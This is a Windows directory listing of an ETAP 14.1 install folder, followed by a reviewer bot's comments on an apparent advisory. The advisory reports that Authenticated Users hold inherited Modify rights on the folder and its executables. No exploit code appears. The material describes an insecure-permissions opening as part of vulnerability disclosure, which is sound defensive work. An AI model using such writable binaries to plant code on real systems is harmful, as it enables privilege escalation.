26/02/2016 16:38 239,104 otilayermanager.dll
26/02/2016 16:38 205,824 OtiLibrary.dll
26/02/2016 16:26 949,760 OtiManage.dll
26/02/2016 16:39 1,397,248 otimanage64.dll
26/02/2016 16:38 72,704 OtiManagedDlg64.dll
26/02/2016 16:25 25,600 otimdbtosql.exe
26/02/2016 16:25 398,336 otimf32.exe
26/02/2016 16:25 12,288 OtiMongoConvert.exe
26/02/2016 16:38 133,632 OtiMongoManaged.dll
26/02/2016 16:25 29,696 OTIOpCon.DLL
26/02/2016 16:38 29,184 OtiOpCon64.dll
19/01/2016 02:28 12,800 OtiPMConfiguration.dll
26/02/2016 16:38 59,904 OtiRemotecode64.dll
26/02/2016 16:38 60,928 OtiRemotecodeinterfaces64.dll
26/02/2016 16:52 538,112 OtiRTDisplay64.dll
26/02/2016 16:38 9,216 OtiRTDisplayInterface.dll
26/02/2016 16:38 86,528 OtiRtWpfControls.dll
26/02/2016 16:38 24,576 OtiRtWpfControlsTelerik.dll
26/02/2016 16:38 574,976 OTIRuleManager.dll
26/02/2016 16:38 24,576 OTIRuleManager.XmlSerializers.dll
26/02/2016 17:22 487,424 otiscenario.dll
26/02/2016 16:38 16,384 OTIScenario.XmlSerializers.dll
26/02/2016 16:25 209,920 OtiServerTracker.dll
26/02/2016 16:38 238,592 OtiServerTracker64.dll
26/02/2016 16:38 5,632 OtiSQLCERead.dll
26/02/2016 16:28 96,768 OtiSQLCeViewer.EXE
19/01/2016 02:28 12,800 OtiSqlUtils.dll
26/02/2016 16:25 229,888 OtiSymbolCreator.exe
26/02/2016 16:24 8,704 OtiSymbolData.dll
26/02/2016 16:25 428,032 OtiSymbolSerializer.dll
26/02/2016 16:38 1,163,264 otitheme.dll
26/02/2016 16:38 210,432 otitheme.xmlserializers.dll
26/02/2016 16:38 287,744 OtiTrack.dll
19/01/2016 02:02 1,043,505 OtiTranslate.xml
26/02/2016 16:36 125,952 pdconfig.exe
19/01/2016 02:31 589,824 PDEUtilities.dll
01/02/2016 11:14 3,760,128 Pegrp32E.dll
01/02/2016 11:14 24,576 PerfSol.Diagnostics.dll
26/02/2016 16:45 98,816 PlotCompare64.exe
26/02/2016 16:45 159,744 PlotFileReader.dll
26/02/2016 16:45 477,184 PlotManager.exe
01/02/2016 11:14 144 PlotManager.exe.config
01/02/2016 11:14 8,945 postaction.cgt
01/02/2016 11:14 6,767 precondition.cgt
19/01/2016 02:28 306,688 psedit.exe
26/02/2016 16:24 253,440 psevent.dll
26/02/2016 16:26 1,324,544 psgrid.exe
08/10/2010 13:20 16,384 psreport.dot
26/02/2016 16:25 189,440 psrept.exe
01/02/2016 11:14 223 psrept.exe.config
26/02/2016 16:25 60,928 pszip.exe
07/04/2016 11:41 <DIR> pvdt40
26/02/2016 16:25 125,952 QCPlot.dll
26/02/2016 16:39 148,480 qcplot64.dll
19/01/2016 02:36 201,216 ra.exe
07/12/2015 22:07 3,593,218 Readme.pdf
15/11/2002 10:51 13,755 Readme.wizard.xml
18/12/2007 13:10 99 RegETAP.BAT
08/10/2010 13:20 14,848 reporta4.dot
03/08/2000 04:50 1,056,768 ROBOEX32.DLL
07/04/2016 11:45 <DIR> Rules
19/01/2016 02:36 1,939,456 SC3Ph.exe
19/01/2016 02:35 5,971,968 scansi1p.exe
19/01/2016 02:36 5,232,640 scansi3p.exe
19/01/2016 02:35 6,535,168 SCGost1p.exe
19/01/2016 02:36 6,431,232 sciec1p.exe
19/01/2016 02:37 5,242,880 sciec3p.exe
19/01/2016 02:35 4,812,288 sciectr.exe
19/01/2016 02:37 5,063,680 scsource.exe
01/02/2016 11:14 21,020 search.avi
19/01/2016 02:36 7,451,648 SFA.exe
26/02/2016 16:38 32,768 ShellControl.dll
19/01/2016 02:32 1,114,112 SkmDataParserLib.dll
01/02/2016 11:14 77 SO.ini
19/01/2016 02:36 708,096 so3ph.exe
19/01/2016 02:34 752,640 stlf.exe
19/01/2016 02:35 5,911,040 svc.exe
01/02/2016 11:14 3,198,976 SX.dll
07/04/2016 11:41 <DIR> Symbols
07/04/2016 11:42 <DIR> SymbolsXaml
01/02/2016 11:14 1,081,344 SyncFusion.Chart.Base.dll
01/02/2016 11:14 602,112 SyncFusion.Chart.Windows.dll
01/02/2016 11:14 61,440 SyncFusion.Compression.Base.dll
01/02/2016 11:14 122,880 SyncFusion.Core.dll
01/02/2016 11:14 1,105,920 syncfusion.diagram.base.dll
01/02/2016 11:14 1,224,704 Syncfusion.Diagram.Windows.dll
01/02/2016 11:14 3,710,976 Syncfusion.DocIO.Base.dll
01/02/2016 11:14 16,384 SyncFusion.Grid.Base.dll
01/02/2016 11:14 16,384 SyncFusion.Grid.Grouping.Base.dll
01/02/2016 11:14 1,003,520 SyncFusion.Grid.Grouping.Windows.dll
01/02/2016 11:14 2,146,304 SyncFusion.Grid.Windows.dll
01/02/2016 11:14 94,208 SyncFusion.GridConverter.Windows.dll
01/02/2016 11:14 814,080 Syncfusion.GridHelperClasses.Windows.dll
01/02/2016 11:14 565,248 SyncFusion.Grouping.Base.dll
01/02/2016 11:14 192,512 SyncFusion.HTMLUI.Base.dll
01/02/2016 11:14 389,120 SyncFusion.HTMLUI.Windows.dll
01/02/2016 11:14 53,248 SyncFusion.Scripting.Base.dll
01/02/2016 11:14 131,072 SyncFusion.Scripting.Windows.dll
01/02/2016 11:14 4,055,040 SyncFusion.Shared.Base.dll
01/02/2016 11:14 26,112 SyncFusion.Shared.Windows.dll
01/02/2016 11:14 13,049,856 Syncfusion.Shared.Wpf.dll
01/02/2016 11:14 16,384 SyncFusion.Tools.Base.dll
01/02/2016 11:14 9,453,568 SyncFusion.Tools.Windows.dll
01/02/2016 11:14 4,284,416 SyncFusion.XlsIO.Base.dll
01/02/2016 11:14 7,090 syslogic.cgt
07/04/2016 11:41 <DIR> Tables
01/02/2016 11:14 8,700 tables.ecd
01/02/2016 11:14 389,120 tag.mdb
19/01/2016 02:31 172,032 tccconvert.dll
19/01/2016 02:31 516,608 tccimport.exe
19/01/2016 02:36 2,227,200 TDULF.exe
19/01/2016 02:31 205,824 TDUpdate.exe
01/02/2016 11:14 1,308,672 Telerik.Windows.Controls.Chart.dll
01/02/2016 11:14 3,068,928 Telerik.Windows.Controls.Charting.dll
01/02/2016 11:14 1,734,656 Telerik.Windows.Controls.Data.dll
01/02/2016 11:14 4,346,368 Telerik.Windows.Controls.DataVisualization.dll
01/02/2016 11:14 3,376,640 Telerik.Windows.Controls.dll
01/02/2016 11:14 876,032 Telerik.Windows.Controls.Docking.dll
01/02/2016 11:14 1,039,872 Telerik.Windows.Controls.Gauge.dll
01/02/2016 11:14 270,447 Telerik.Windows.Controls.Gauge.xml
01/02/2016 11:14 2,611,200 Telerik.Windows.Controls.GridView.dll
01/02/2016 11:14 2,254,336 Telerik.Windows.Controls.Input.dll
01/02/2016 11:14 2,712,576 Telerik.Windows.Controls.Navigation.dll
01/02/2016 11:14 1,668,096 Telerik.Windows.Controls.RibbonView.dll
01/02/2016 11:14 1,863,168 Telerik.Windows.Controls.ScheduleView.dll
01/02/2016 11:14 405,948 Telerik.Windows.Controls.xml
01/02/2016 11:14 453,632 Telerik.Windows.Data.dll
01/02/2016 11:14 248,444 Telerik.Windows.Data.xml
07/04/2016 11:41 <DIR> Themes
01/02/2016 11:14 56,320 TraceView.exe
19/01/2016 02:40 29,412,352 ts.exe
01/02/2016 11:14 63,488 u2lexpo.dll
01/02/2016 11:14 82,432 u2lsqrt.dll
01/02/2016 11:14 27,136 u2lstrng.dll
19/01/2016 02:34 71,680 UC.exe
26/02/2016 16:24 620,032 WCT32DR3.dll
26/02/2016 16:38 722,944 wct32dr364.dll
30/09/2015 14:48 45,843 WhatsNew_14.htm
12/11/2014 14:32 3,702 WorkPermitTemplate.xml
26/02/2016 16:25 492,032 WRT32DR3.dll
26/02/2016 16:39 592,384 wrt32dr364.dll
395 File(s) 992,689,139 bytes
19 Dir(s) 11,092,480,000 bytes free
C:\ETAP 1410>
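Review bot: The Desc text blames the 'C' flag (Change) for 'Authenticated Users', but the icacls output in the same file shows `NT AUTHORITY\Authenticated Users:(I)(M)` on both the directory and etaps64.exe; cite the `(M)` (Modify) ACE that is actually shown so the description and the evidence agree. Every ACE in that output carries `(I)`, meaning it is inherited from the parent container rather than set explicitly on the install directory, and saying so would point readers at the fix: an explicit ACL on `C:\ETAP 1410` that drops Modify for Authenticated Users. The 395-file `dir` listing under "Affected binaries" does not show which files are writable; one sentence noting that the inheritable `(I)(OI)(CI)(IO)(M)` entry applies to everything under the directory would carry the same information. "Microsfot" on the "Tested on" line is a typo.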